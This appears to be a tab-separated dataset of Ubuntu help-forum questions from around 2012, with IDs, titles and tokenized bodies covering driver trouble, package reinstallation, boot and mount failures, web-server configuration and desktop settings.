225767	installing a downgraded version of firefox 16 from ppa	i 'd like to fetch and install old ff16 instead of ff17 on ubuntu 10.04 lts server . currently ff17 is default . ff17 is incompatible with selenium 2.26 http : //stackoverflow.com/questions/13600247/unable-to-run-selenium-suite-on-firefox-17 how one can install an old version of firefox with apt-get ? can one pindown this version so that it is not automatically updated ? also if there exists a static ff16 installation available it is a solution . apt-cache policy firefox firefox : installed : 17.0.1+build1-0ubuntu0.10.04.1 candidate : 17.0.1+build1-0ubuntu0.10.04.1 version table : *** 17.0.1+build1-0ubuntu0.10.04.1 0 500 http : //dk.archive.ubuntu.com/ubuntu/ lucid-updates/main packages 500 http : //security.ubuntu.com/ubuntu/ lucid-security/main packages 100 /var/lib/dpkg/status 3.6.3+nobinonly-0ubuntu4 0 500 http : //dk.archive.ubuntu.com/ubuntu/ lucid/main packages
225771	disable alt ( hold ) in ubuntu 12.10	when i hold hold alt it displays a box in the corner for that programs application menu . i hate this and its extremly annoying . how do disable this ?
225774	12.10 nvidia driver issues	after installing the nvidia drivers from the additional drivers tab of software sources , running nvidia-xconfig and dpkg-reconfigure xorg xorg-server xorg-server-core , the system still boots into low graphics mode . it can be fixed by a restart of lightdm but this should n't be necessary , any ideas ? thanks
225786	how do i re-install samba ?	i recently followed a guide to configure samba but i could n't get it configured properly . after realizing that the guide was six years out of date i thought i should start again . i reinstalled samba by first using these commands : sudo apt-get purge samba sudo apt-get install samba but after reading my configuration file ( /etc/samba/smb.conf ) i noticed that it was the same file , containing the same edits i had made . i then proceeded to delete the directory and then re-install samba again . however , the directory is not replaced after re-instillation and now i do n't appear to have a configuration file . how do i get it back ? or install samba correctly ?
225788	how to control / disable low level battery on bluetooth mouse	i have a little problem with my kesington bluetooth mouse on ubuntu 12.10 . ubuntu 12.10 considers my bluetooth mouse battery as a system battery as if it was the main laptop battery ( so i have two on the battery indicator , the main and the bluetooth one ) . when it runs low level , near to die , battery , my laptop acts as if it was the main battery and i must quickly stop bluetooth and continue on the touchpad if i want to work . can anyone help me ? maybe i prefer to disable the battery control over the mouse , i do n't care about it , i know it is fully charged , but ubuntu always starts on 33 % or less , i just want to work with it and when it will be battery-off i will recharge the batteries . many thanks in advance . alberto .
225792	visiting launchpad.net in browser causes icon to appear in launcher , how do i remove it ?	using ubuntu 12.10 with unity . i think i agreed to install a launchpad add-on in firefox the first time i visited the site ( launchpad.net ) , and ever since then , whenever i have an open tab in firefox with any page on launchpad.net loaded , an icon appears in my launcher desktop widget . if i right-click on the icon and select quit , it also closes the tab in firefox . i 've since uninstalled the firefox add-on and rebooted , and it 's still happening . how do i make it stop ? it 's so annoying screenshot :
225801	is it possible to extend filesystem using network drive ?	i 'm running very low free disk space on my file system . is it possible to extend file system size using network drive ( using lvm or similar ) preferably i would like to use google drive ( there is something called gdrive to mount google drive . )
225804	task manager like windows 8	is there a way to make it similar , i like knowing what is going on with my hard drive and system resources .
225805	firefox is pounding my system what should i do	i 'm running the latest version of firefox 17.0.1 on ubuntu 12.10 on a acer aspire one 722 netbook . it has an amd dual core c60 processor and 2gb ram . as you can see , firefox is absolutely killing my system , it responds really slowly and opening tabs is a royal pain . i have on an average 4-5 open tabs at a given time . is there something that i can do to make my browsing experience more zippy ? additionally i run the following addons firebug https everywhere ad block plus
225811	how to reinstall google chrome ?	i have already downloaded google-chrome-stable_current_i386.deb after that i type this on terminal sudo apt-get install libcurl3 libnspr4-0d libxss1 cd downloads sudo dpkg -i google-chrome-stable_current_i386.deb ( i got an error every time i run this ) : dpkg : error proccesing google-chrome -stable_current_i386.deb ( -- install ) : can not access archive : no such file or dir . i do n't know what happens , but i just see that on internet while i 'm searching google chrome for linux .
225814	documents folder missing	my incredibly tech smart girlfriend took control of the cockpit and closed ( like in close arrow ) my virtual machine running ubuntu 12.10 . when i restarted , my 'documents ' folder in 'home ' was missing . how do i recover it ? thank you
225815	how to install git server on my ubuntu desktop 12.04	i 'm developing a project on my desktop and i 'm in need of a version control mechanism . i 'm working on ubuntu 12.04 , desktop edition . i would like to have a git server installed on localhost and also the client will be installed in the same computer . it 's easy to install the client but i ca n't find a full explained guide of how to install the server.. i found a guide of installing gitosis but it 's no longer supported ( not supported on ubuntu 12.04 )
225820	how to create a os x mountain lion bootable usb drive on ubuntu ?	i already know how to do it on mac os x ( plenty of instructions online ) . but is it possible to do it on ubuntu ? if yes , how ?
225822	stop kde services from running	i recently installed kde with the command sudo apt-get install kubuntu-desktop . now whenever i log into unity i can see kde-related services running in the background and i see no obvious way to prevent them from opening at startup . i checked bum but i see nothing there . these are the services i see running right now : kde4 klauncher knotify4 these ones i can identify as being related to kde given their names , but there could be more . how can i prevent these services from launching by themselves ? i should mention i often use kde applications such as kate , okular and kile . could these be responsible for opening those services ?
225826	how do you uninstall openbox/gnome ?	so i installed a couple desktop environments like gnome and lxde for my older computer because unity seemed really slow afterwards i logged out and went to select one and notice after i installed lxde it installed openbox and openbox/gnome . openbox is fine but openbox/gnome does n't work at all when i start it seems to just load the desktop blank and the right and left click are not showing the openbox like options so clearly it is n't working . how would i uninstall openbox/gnome but keep just openbox and why did lxde install it in the first place ?
225827	how do i move the mount point of a drive	i have /dev/sda2 mounted as /mnt . i am actually running my system from a volume mounted at /mnt/install ( i 've chrooted to /mnt/install ) . i 'd like to be able to use that disk from within my chrooted linux . how do i move /dev/sda2 from /mnt to /mnt/install/mnt/fast ?
225831	create windows share shortcut	i can easily connect to a windows share with the follow path on my windows machine by using the dash home search function : smb : //dextrousdave-pc/users/dextrousdave/google % 20drive now problem is , i need to type in this command every time or navigate via the 'browse network ' icon in nautilus ... which is tedious . how can i create a shortcut in nautilus for the folder : users/dextrousdave/google % 20drive ? thank you
225832	ubuntu 12.04 stuck on loading screen . how can i save my data ?	i 'm using ubuntu 12.04 since months , but from one day to another ubuntu is not booting anymore . i installed it with wubi under windows vista . how can i save the data i have on my ubuntu ? i tried different tools to enter my linux system through windows , but i do n't see any ubuntu files . i already tried linux reader and ext2fsd . i think the reason why i am not seeing my files from the ubuntu system is because there is no such partition . best denis
225838	error â¨sheduled backup delayedâ¨ even though network is available	i get this message every time i bootup the machine schedule backup delayed backup will begin when a network connection becomes available the network is working fine and i can use the internet , also i can manually perform backups . i am a new user & using ubuntu 12.04 precise pangolin . below is the link of screenshot of the error message ( unable to attach image as a new user ) . here is the error message :
225848	ubuntu 12.10 : installing proprietary nvidia driver causes freeze at boot	ok , so i just installed ubuntu on my laptop , and i immediately encountered an issue : the hdmi audio output wo n't work . yes , i know about the sound settings thing where you have to select the hdmi option , but even when it 's selected i get no sound out of the tv i 'm hooking it up to . this is a dealbreaker for me , because my laptop speakers are terrible , it 's one of the big reasons i use my tv monitor . so i decided to work on solving the problem by upgrading my nvidia drivers . i switched to one of the propriety drivers offered in that software updating utility that comes with the os , the one option that said ( tested ) . viola , sound over the hdmi is now working . unfortunately , this now brings me to my next problem : when i reboot ubuntu with this or any other proprietary driver installed , it freezes when it tries to load my desktop . as in i can see my wallpaper , but no icons or options of any kind . the system is totally frozen , and gives me one of those `` we 've experienced an error , do you want to report it messages . '' so there 's my bind . i need hdmi audio out , that 's a total dealbreaker for me , but installing the drivers that give me that capability crash the system . does anyone have any idea what 's causing this
225854	redirected to log in screen 12.10	so , i installed ubuntu 12.10 in windows 7 and everything was running fine , i configured some stuff , installed some programs and registered to ubuntu one . nothing major . today though i tried signing in my ubuntu boot . whenever i try to log in to my user i get redirected to a black screeen , then back to the loginscreen if i log in using the guest account everything works fine . i could even edit the profile of my user after entering the password ( in fact i removed the password , and now i ca n't edit the profile again cause it keeps asking for a password ) if i press ctrl alt f1 during login screen i started up the terminal . from there i can log in to my account . now , my computer has the following partitions : 100mb system reserve ( reserved by win 7 ) 168gb c : windows & ubuntu 762gb o : data i have realised that during the log in screen terminal i can not find the data drive under /media/mangusbrother/ the folder is just empty . tell me if i can do something to maybe give you more information . i 'm really at a loss at what to do here and i 'd prefer to not reinstall the whole os again .
225856	i want one of my users to be able to 'sudo init 5 ' without being asked for a passwd . how to do it ?	i want one of my users ( let 's call him : pn ) to be able to start x by sudo init 5.i do n't want to give him access to any other commands . i read man sudoers , but i do n't understand too much of it . can anyone provide a quick line to add to /etc/sudoers file that would do the trick ? i would be grateful eternally .
225858	how do i get a texas instruments acx 111 wireless card working ?	i just installed ubuntu 12.04 and i have a texas instruments acx 111 wifi card . i have looked at a few topics about how to get the drivers for it , though , all the download links do n't work ... does anyone here know where i can get these drivers . here is a link to the one of the first topics i read https : //help.ubuntu.com/community/wifidocs/driver/acx111 the driver 's link and firmware link does n't work .
225860	why does n't super key display some scripts ?	i recently downloaded crashplan for my laptop running 12.04 . it installed a shortcut to the desktop to the gui which is pointing at /usr/local/crashplan/bin/crashplandesktop ( a shell script ) . this is all good and well , but i would rather remove the icon and be able to launch it by pressing the super key and searching for `` crash '' so that i do n't have to keep the icon on my desktop . however , it does n't show up in the results . why is this ? and is there to make it appear in the search results ?
225862	ctrl+alt+ [ left/right ] not working in ubuntu in vmware	i 've installed ubuntu 12.04 as a vmware virtual machine . i like to switch between my workspaces using the ctrl+alt+arrowkeys but it does n't work . it works on my other system with the `` proper '' install . this is a problem with only the left and right keys . it works fine for up and down .
225865	copy files without losing file/folder permissions	how can i copy files/folders from an ubuntu computer on a ext4 filesystem to another ubuntu computer which also is on an ext4 filesystem , using a usb stick which uses a vfat filesystem without losing file permissions ? i 've tried the basic ctrl-c from source computer , then ctrl-v to usb , then ctrl-c from usb then ctrl-v to target computer , and none of the file/folder permissions stay intact .
225866	grub wo n't always start when usb hdd present	i have ubuntu 12.04 dual boot with windows 7 on my dell xps 17 . i have following issue with my grub loader . when my usb hdd is pluged in , grub wo n't always load . i have to reset my laptop , and it may work without problem or it can fail . if i disconnect my hdd , and start laptop everything works great . my hdd is westerndigital my passport 500 gb with only one usb connection ( no external power supply ) . does anyone know what could be the problem ? it is not the biggest issue but it is a little annoying . thanks in advance .
225872	how do i edit text in a scanned .jpeg ?	i need to upload a scanned image as a pdf document . after scanning the document , i have a .jpeg with small text that i want to edit before converting to pdf for the upload . i have never done this before so i 'm really stuck . how can i do this ?
225874	why is the middle button mapped to pasting ?	i 'm in love with ubuntu , but i really hate this feature . i am a programmer and it happened a number of times that i introduced a bug because i inadvertently pasted some code which did n't belong there . i still have nightmares from debugging . and i ca n't even turn it off in the 'mouse and touchpad ' window . i think it 's a weird design decision . most people expect the middle mouse button to map to scrolling . what was rationale behind this decision ?
225875	multiple terminals do n't always restore	i generally keep half a dozen terminal windows open . on reboot , usually they are restored to their previous size and position , even if i have closed them all before rebooting . however , sometimes they do n't restore but are all on top of each other in the upper left of the screen . is this a bug , or is there a setting somewhere that can guarantee that they will be restored as desired ? i have tried adding `` gnome-terminal -- load-config=my_saved_config '' to my profile , but this just doubles up the number of terminals , so apparently the configuration is already being saved somewhere else . where is all this controlled ? i have searched the forums and the likely places in the file system , but have not found anything . thanks
225878	mythtv 0.25 rescan for videos	i have been searching for instructions regarding rescanning the /var/lib/mythtv/video folder . most instructions are dated and reference older mythtv versions . some note that mythvideo has been 'pulled into ' the mythcore with version 0.25 . i am running 0.25 . how do i rescan for new videos ( *.mkv and/or *.avi ) within the above mentioned video path ?
225887	no drivers listed ? /how to install all drivers ? 12.10	so i go to system settings in ubuntu 12.10 and i want to install my drivers but under the additional drivers , my lan doesnt work , doesnt even pick up that im plugged in threw ethernet cord . i have a gtx 670m with 3gb gddr5 for a video card and would like to use that . just need help , pretty new to ubuntu . ok when i looked at that other question i did the sudo lspce -nn and this is what i got madmike @ mike-gt70 : ~ $ sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation 3rd gen core processor dram controller [ 8086:0154 ] ( rev 09 ) 00:01.0 pci bridge [ 0604 ] : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port [ 8086:0151 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb xhci host controller [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation 7 series/c210 series chipset family mei controller # 1 [ 8086:1e3a ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation 7 series/c210 series chipset family high definition audio controller [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 1 [ 8086:1e10 ] ( rev c4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 3 [ 8086:1e14 ] ( rev c4 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 7 series/c210 series chipset family pci express root port 5 [ 8086:1e18 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation hm77 express chipset lpc controller [ 8086:1e57 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 7 series/c210 series chipset family smbus controller [ 8086:1e22 ] ( rev 04 ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:1213 ] ( rev ff ) 02:00.0 ethernet controller [ 0200 ] : atheros communications inc. device [ 1969 : e091 ] ( rev 13 ) 03:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 2230 [ 8086:0887 ] ( rev c4 ) 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader [ 10ec:5209 ] ( rev 01 ) 04:00.1 sd host controller [ 0805 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader [ 10ec:5209 ] ( rev 01 ) let me know if you need any more info ? sorry it took so long .
225888	question about 12.10 32 bit syslinux 4.06 edd 2012-10-23 usb direct boot	alright so guys i am trying to do a direct boot for ubuntu 12.10 ( as stated in the topic ) i have been trying to do a direct boot for about ten minutes now . so i have to do a direct boot because my original os has a corrupted kernel ( i am trying to fix a friends laptop ) toshiba satellite c655d-s5518 anyway getting back to the main point when i put the usb in everything starts up fine it loads the usb then it goes to this screen saying '' syslinux 4.06 edd 2012-10-23 copyright ( c ) 1994-2012 h. peter anvin et al . '' also getting a blinking line ( as if i could put something in however when i try to type it does not show up so im guessing its telling me it is loading ) however i am not getting a corrupted file or any kind of file error so im guessing my main question is , is this normal ? and if so how long does it take for this to be done and what are the steps proceeding this ? sorry guys if this is a dumb question i am new to the ubuntu party haha thanks logan .
225890	why rewrite directive causes `` 301 moved permanently '' with nginx ?	below is a much simplified version of what i have in the configuration file of a server run by nginx 1.2.5 , yet it causes 301 moved permanently with location : http : //example.com/phpmyadmin/ before serving data , which is not what i expected from the default behavior of the rewrite directive . server { listen 80 ; location /pma { rewrite ^ /phpmyadmin ; } location /phpmyadmin { root /var/www ; index documentation.html ; } } ( again , the example is highly simplified and altered , the config makes perfect sense in its original form . ) when i go to http : //example.com/pma in a browser , the data is served but the url in the address bar changes to http : //example.com/phpmyadmin/ while it was supposed to stay http : //example.com/pma . how do i avoid nginx sending 301 moved permanently so that it does n't expose the actual directory structure on my server ?
225892	data : loss on installation	i installed 12.04 some time ago . prior to that i had been running ubuntu 11 ? as a dual-boot system . i am still a novice with all this and i assumed ( wrongly ) that i would be able to do the same when i upgraded - i guess that i must have done something wrong during the install . the problem that i have is that i seem to have lost 2,000 or so photographs and i would like to get them back if possible . any help would be gratefully received .
225893	what 's wrong with lualatex ?	i 'm not sure if this is a bug or i 've done something wrong ( or i simply do n't know luatex well enough ) . this minimal example file test.tex \documentclass { article } \usepackage { luacode } \begin { document } a random number : \begin { luacode } tex.print ( math.random ( ) ) \end { luacode } \end { document } should compile with lualatex test.tex but fails with : ! latex error : file `luacode.sty ' not found . it sounds like something was messed up in the installation of luatex . they look to be installed : > dpkg -- get-selections | grep luatex luatex install texlive-luatex install the file exists on my system : > locate luacode.sty /usr/local/texlive/2011/texmf-dist/tex/lualatex/luacode/luacode.sty so i 'm not how to troubleshoot this . is the package messed up or is it a problem on my end ?
225895	why do i have to 'buy ' a free item in the ubuntu software center ?	when using the ubuntu software center , why do i have to go through the extra steps to 'buy ' a free item ? why ca n't it just get installed ?
225898	how do i turn on wireless adapter on hp envy dv6 7200 under ubuntu ( any version ) ?	i have a new hp envy dv6 7200 with dual boot windows 8 / ubuntu 12.04 . in windows , the f12 key in windows activates the `` airplane mode '' switch which enables/disables both on-board ( mini pcie ) and usb wireless adapters . in ubuntu , however , the wireless adapter is turned off by default and can not be turned back on via the f12 key ( or any other combination of f12 and ctrl , fn , shift , etc. ) . let me explain the `` fixes '' i 've seen in various forums and explain what did or did not happen . these are listed in no particular order . ( spoiler alert : wireless is still broke ) . solution 1 ? use hp 's `` wireless assistant '' utility to permanently activate the wireless card in windows , then boot into ubuntu to happily find it working . unfortunately , this utility works in windows 7 but not windows 8 . on the other hand , hardware drivers from hp are only available for windows 8 for this model . catch 22 ( i could not find a comparable utility for windows 8 ) . solution 2 ? use a usb wireless adapter to sidestep the on-board device . i purchased such a device from thinkpenguin.com to be sure that it would be linux-friendly . however , the wireless switch enables / disables all wireless devices including usb . so , there 's my $ 50 donation to the nice folks at thinkpenguin.com , but still no solution . solution 3 ? following the think penguin folk 's suggestion , modify the mini pci express adapter following instructions here : http : //www.notebookforums.com/t/225429/broken-wireless-hardware-switch-fix tempting , but i then violate the terms of my warranty mere days after opening the box . this might be a good solution for an older machine that you want to get your geek on with , but not for a new box . solution 4 ? rfkill unblock all no effect whatsoever . ubuntu @ ubuntu-hp-evny : ~ $ rfkill unblock all ubuntu @ ubuntu-hp-evny : ~ $ rfkill list all 0 : hp-wifi : wireless lan soft blocked : no hard blocked : yes solution 5 ? re-install drivers . done and done . ubuntu recognizes the device - perhaps even without re-installing the drivers ? - but can not turn it on . how do i know this ? in the network manager drop-down menu , the wireless option is blacked out and a message reads something like : `` wireless network is disabled by a hardware switch '' . solution 6 ? identify a physical switch on the laptop and flip it . there is no such switch on this machine . in fact , walking through best buy yesterday , i checked and not a single new laptop pc had a physical switch on it . all of the wireless switches are either the f2 or f12 key ... i wonder if askubuntu will not be plagued by this exact issue in the near future ? additional info - lspci ubuntu @ ubuntu-hp-evny : ~ $ lspci 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1c.3 pci bridge : intel corporation panther point pci express root port 4 ( rev c4 ) 00:1c.5 pci bridge : intel corporation panther point pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation device 0de9 ( rev a1 ) 08:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5229 ( rev 01 ) 0a:00.0 network controller : ralink corp. device 539b 0b:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) any suggestions would be much appreciated !
225899	how do i find lost folders	somehow ( i do n't know how ) i seem to have lost my documents file . i thought i 'd look in the trash but that now just seems to open my home folder . what might have happened ? i 've searched for files looking for them but to no avail . what should i do ? any help is greatly appreciated .
225909	which version of ubuntu is recommended for samsung n270 notebook ?	i have just installed 12.04 lts 32bit because it was recommended but it seems slow , slightly slower than the ex family edition windows which came with the notebook and i used for 3 years ... . so it makes me wonder if this is the correct version of ubuntu for me . ( or.. maybe i need to install the driver for my built in graphic card ? or anything else . ) specs : samsung n270 notebook . intel atom cpu n270 @ 1.6gh x 2 . 1gb ram i am not sure the type of graphic card i just know that it is built in of intel . thank you guys for the help . patu .
225912	ubuntu black screen after installation of 12.10 live usb	my computer was made in 2004 , but i 'm sure it does n't matter since it 's a durable machine . so recently , i decided to breathe new life to it with linux . i tried lubuntu 12.10 , nope . black screen after install . so i tried ubuntu 12.10 when i gave up , and same exact thing . except , this time i 'm fighting for it , since ubuntu is the best os i 've ever seen . so back on-topic , when i start the installation , it says that something is already mounted ( sda or something of the sorts ) so i just figure that it 's the live usb i 'm using . so i let it ignore it , and move on . the rest of the installation goes smooth , all looks fine . then i get to the screen with the introductory to ubuntu . meanwhile , it 's still installing , but finishing up . i 'm not sure if the install actually finishes , but i do know that after a bit , the screen goes back to the desktop . the install closes and i 'm back at the desktop , and the cursor is showing the `` loading '' symbol , as if it were still working . then the screen goes black , with the same cursor . after that , nothing . i left it over night like that thinking it was doing something , in the morning it was still black with the cursor circling or whatever . so what could be causing this ? one concern i have is that i have a nvidia graphics card ( 7300 gt ) . i heard that nvidia is n't compatible with linux ? i did notice that it was marked as unreconigsed by ubuntu , so is that the problem perhaps ?
225913	gtk theme change does n't apply to kde apps ?	i changed the systemwide ambiance theme a bit ( specifically the scrollbar css ) , and this works fine in gtk apps , but in kde apps nothing has changed . they still have the vanilla ambiance look . i tried rebooting too . btw i 've disabled overlay scrollbars . i looked at this question : why do n't qt4 apps in lubuntu pick up the gtk theme ? and tried setting the gtk+ theme in qtconfig but that did n't help . the look remains the same . changing the theme in qtconfig to another one , such as qtcurve , does have an effect though .
225914	install ubuntu like it was bought at a store	when you buy a computer the first time you start it up you create an account for it . is there anyway to have this happen when you install ubuntu .
225915	http strict transport security on apache	i could not find one topic on hsts here on askubuntu.com yet so here it comes : i want to setup hsts so that my webserver will force the browsers to use https . does anyone know how to set this up for apache2 in a proper way ?
225922	remaining time for laptop battery in system tray with xfce4-power-manager ?	i 'm using xubuntu on my laptop , and i wonder if there 's a way to have the remaining time of my battery displayed in the system tray with the xfce power manager ? it tells me how much time i got left when i mouseover the icon , but i could't for the life of me find an option to have it display that information in the system tray . if that 's not possible , i 'd be happy about alternatives that could do what i 'm looking for . : )
225930	how do i get the latest ( beta and development ) version of chromium ?	confronted with this issue i found that i need to run a version of chromium that is newer then the one in the repositories in order to use an extension that i want . can i get a such new , even latest version ? in windows i can use beta chromium portable that is newer than google chrome . how to get that newest chromium here in ubuntu ? related : how to install the latest stable version of chromium ?
225948	error installing on via motherboard c3 cpu	im working with an oem , and we are wanting to build a carpc , for use in an electric car . we want to build a system similar to mimod ( mimodhp.com ) . mimod is too expensive , it is a closed system , and its based on windows ( i cant see doing that , especially for a pc that controls the operation of the vehicle , with gauges etc ) . i think linux is the way to go . so i thought why not test the latest ubuntu ? created the ubuntu 12.10 usb stick on an hp laptop running vista . booted ubuntu on the laptop , to check out ubuntu and the usb stick . it worked great ! btw this is a very cool idea to be able to `` try '' ubuntu this way ! kudos to whoever came up with that idea . in order to show a proof of concept , and test ubuntu on a small pc , i have an older ( but hardly used ) via motherboard with a c3 processor . i wanted to see if ubuntu 12.10 will run on it , as well as it ran on the laptop , and install ubuntu 12.10 onto a blank 40 gig ide drive hooked up to this mb . note : i have windows xp home edition running with no problems on this mb , off another drive . here 's the initial post on the screen : model epia-m bios 1.13 via c3 600a mhz ( 133x4.5 ) at first , installer gave me the error : loading bootlogo - graphics initialization failed error loading gfxboot i googled that , entered `` help '' at the boot prompt . it gets further . i see : loading /casper/vmlinuz ... ... loading /casper/initrd.lz ... ... ... . after a looong wait , it comes up with the following message : unable to boot - please use a kernel appropriate for your cpu . does the fact i booted off this usb stick on laptop make any difference ? should i reload the iso on the usb stick ? or do i need to burn the installer on a dvd , and use that ? in other words , does the install for a dvd have different software on it than for a usb stick ? or are they the same ? thanks in advance for any help anyone can offer me . johan
225949	can not mount root filesystem on 10.04	i tried to apply the recommendation of question : kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) after running that command : sudo mount -- bind /dev /mnt/dev i get this error message : mount : mount point /mnt/dev does not exist fdisk -l returns /dev/sda1 /dev/sda2 /dev/sda5 do i need to mount sda2 and sda5 ? edited after @ psusi 's comment : /dev/sda1 is the boot file system it seems that i need to mount sda2 or sda5 . here is what i tried : ( i tried this on a virtual machine so the sda ( s ) are now vda ( s ) ) ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/vda : 19.3 gb , 19327352832 bytes 16 heads , 63 sectors/track , 37449 cylinders units = cylinders of 1008 * 512 = 516096 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0008eece device boot start end blocks id system /dev/vda1 * 3 496 248832 83 linux partition 1 does not end on cylinder boundary . /dev/vda2 498 37448 18622465 5 extended partition 2 does not end on cylinder boundary . /dev/vda5 498 37448 18622464 8e linux lvm ubuntu @ ubuntu : ~ $ ubuntu @ ubuntu : ~ $ ubuntu @ ubuntu : ~ $ sudo mount -t ext4 /dev/vda5 /mnt mount : wrong fs type , bad option , bad superblock on /dev/vda5 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so ubuntu @ ubuntu : ~ $ sudo mount -t ext2 /dev/vda5 /mnt mount : wrong fs type , bad option , bad superblock on /dev/vda5 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so ubuntu @ ubuntu : ~ $ any info that can help me rescue that server would be greatly appreciated !
225955	migration of user dictionaires	i used xubuntu from 5.04 to 10.04 , always using the lts updates or the minor updates . meanwhile my user dictionairies grew . now i have a new machine with a fresh install , and did n't wanted to clone the system , and perform more updates , but made a fresh install . i 'm partly copying the data from the old system to the new , and want to find most dictionaries , but it starts with me not being sure , which program uses such . probably these programs are affected : firefox + thunderbird ( no other browser/mailer in use ) openoffice ( not in use : libre office or other office suites ) eclipse ( on other ide ) gedit ( no other editor ) postgresql ( only database ) i mention postgresql because i know it has a dictionary , but i do n't think i added something here . so far , i only found ~/.mozilla/firefox/kk99xy23.default/persdict.dat do you know where i can find the other ones , and which exist at all ? did i probably forget a popular one ?
225962	missing bootmgr	by mistake i have removed the window bootmgr when i was using ubuntu os-installer/uninstaller . my netbook does not have a cd-rom drive so , i have been trying to installed ubuntu again by using the usb drive but sadly it failed . i have already attempted to change the priority boot too . please help thank you
225970	no inodes left error , df -i command says contrary	i copied a lot of files in my mounted windows drive from ubuntu and i subsequently ran into error opening file '/media/windows/ < some-file-path > ' : no space left on device error . i checked the output of df -i command to see if i had ran out of inodes for the mounted windows drive : filesystem inodes iused ifree iuse % mounted on /dev/sda5 2363904 504119 1859785 22 % / udev 207621 522 207099 1 % /dev tmpfs 211487 450 211037 1 % /run none 211487 3 211484 1 % /run/lock none 211487 7 211480 1 % /run/shm none 211487 19 211468 1 % /run/user /dev/sda2 458686680 2588876 456097804 1 % /media/windows as above output shows , lots of inodes are available for /media/windows drive . i have plenty of disk space left - around 500gb . what 's the problem then ?
225975	usings xargs in terminal with a bash script	test.txt has four urls in it . urls.sh : cat test.txt | xargs -n 1 check.sh uses command-line arguments for its url variable . in terminal , what do i write so that all the urls can be checked with check.sh using the urls.sh ? like if i say , ./check.sh http : //www.cnn.com the bash script works perfectly . i 've tried : ./check.sh ./urls.sh ./check.sh | ./urls.sh ./urls.sh | ./check.sh
225976	which is the best package to draw drawings in python ?	we are trying to implement the drawing tools like line , circle , pencil , brush and so on in gtk . is it possible to draw these things into the textview ? would one of these packages work for the project ? pygame pyglet pycairo
225980	apache2 and its directories	assume my webserver hosts multiple domains . where is my directory that contains the active web domains ?
225984	how can i configure two monitors from two video sources ?	i am currently only able to get a single display running ( from nvidia card ) , and i want to use a second monitor using my motherboard 's video output . the system settings only display the first monitor , though during boot , the second monitor displays some graphics and information . does anybody have any experience with this ?
225988	bad screen flicker from video recording of recordmydesktop	i have ubuntu 11.10 and i installed recordmydesktop . video recording from recordmydesktop always result in screen flicker . in recording i see half of the screen moving forward while half would be stuck . i checked the settings and `` frame per second '' is set to 15 one such recording is available here - http : //www.youtube.com/watch ? v=qaff44m2ttk & feature=youtu.be i am quite new to ubuntu and not sure what is wrong .
225989	transmission wo n't work on port 80	i was trying to use transmission 's web interface , and it worked perfectly . i could access it via http : //localhost:8080/transmission/web/ , i could use my local ip , i could use 127.0.0.1 , i could , after port-forwarding , even use my actual ip . a dns connection even succeeded ! i was annoyed by the :8080 tacked onto the url , and wanted to remove it , so , i went into transmission 's settings and changed it to port 80 . all of a sudden , i could n't connect via any method ! they all failed . even pressing the `` open web client '' button in transmission 's settings did n't work . ( just a generic `` could not establish connection '' message , incase you were curious . ) note : i do not have apache or any other server software installed . i then , in a panic , switched back to port 8080 , and everything was fine . another try on 80 , and failure . restarting transmission did n't fix anything , either . ( on a hunch , i tried connecting to the :8080 url while i 'd set it to port 80 , just to see if it was still using the old port . it was n't . ) anyway , this is n't a critical issue , but i 'd really like to be able to use port 80 for my web client ! ( well , i 'd actually like to be able to use 443 , but that 's another question ... )
